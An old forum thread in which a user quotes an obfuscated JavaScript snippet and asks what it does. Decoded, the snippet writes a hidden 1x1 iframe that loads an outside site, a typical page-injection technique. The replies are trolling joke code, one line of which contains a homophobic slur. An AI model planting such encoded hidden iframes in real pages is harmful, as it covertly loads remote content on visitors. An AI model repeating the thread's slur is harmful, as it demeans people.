What does this code mean??

Status
Not open for further replies.

LiftBigEatBig

Banned
Jun 30, 2008
64
0
0
www.hardgainersguide.com
Code:
<script type='text/javascript'> str='@3c@49@46@52@41@4d@45@20@53@52@43@3d@27@68@74@74@70@3a@2f@2f@77@77@77@2e@66@75@63@6b@79@6f@75@2e@63@6f@6d@2f@3f@31@32@33@34@35@27@20@57@49@44@54@48@3d@31@20@48@45@49@47@48@54@3d@31@3e@3c@2f@49@46@52@41@4d@45@3e'; document.write(unescape(str.replace(/@/g,'%'))); </script>
 


Im working on a newb script, I wonder if someone here can help me with it.

post boobies &/or GTFO

If action /= "boobies"

print"fuck you faggot"

The code is a little loose at this point, but I think this could be a real time saver for me.
 
Code:
if(threadAuthor.status == STATUS_NOOB) {
    if(thread.iconUsed == ICON_BOOBS) {
    if(!thread.containsImage(PATTERN_BOOBS)) {
        threadAuthor.setStatus(BANNED);
    }
  }
}
 
Status
Not open for further replies.